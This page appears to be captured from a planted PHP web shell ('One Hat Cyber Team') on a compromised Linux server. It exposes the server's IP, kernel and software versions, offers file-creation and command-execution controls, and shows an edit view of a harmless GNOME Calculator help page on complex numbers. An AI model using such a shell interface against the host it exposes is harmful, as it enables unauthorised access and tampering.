One Hat Cyber Team
Your IP :
216.73.216.50
Server IP :
157.15.65.100
Server :
Linux 157-15-65-100.cprapid.com 5.14.0-362.24.2.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Mar 30 14:11:54 EDT 2024 x86_64
Server Software :
Apache
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
help
/
sl
/
gnome-calculator
/
Edit File:
complex.page
<?xml version="1.0" encoding="utf-8"?> <page xmlns="http://projectmallard.org/1.0/" type="guide" id="complex" xml:lang="sl"> <info> <link type="guide" xref="index#number"/> </info> <title>Kompleksa števila</title> <p> <app>Calculator</app> supports complex numbers, as well as the following functions while in <link xref="mouse">Advanced mode</link>. </p> <table> <tr> <td><p>Re</p></td> <td><p>Returns the real part of a complex number. For example:</p> <example> <p> Re (2-5i) = 2 </p> </example> </td> </tr> <tr> <td><p>Im</p></td> <td><p>Returns the imaginary part of a complex number. For example:</p> <example> <p> Im (2-5i) = -5 </p> </example> </td> </tr> <tr> <td><p>conj</p></td> <td><p>Returns the conjugate of a complex number. For example:</p> <example> <p> conj (2-5i) = 2+5i </p> </example> </td> </tr> <tr> <td><p>Arg</p></td> <td><p>Returns the argument of a complex number. For example:</p> <example> <p> Arg (2-5i) = -68.1986 </p> </example> </td> </tr> </table> </page>
Simpan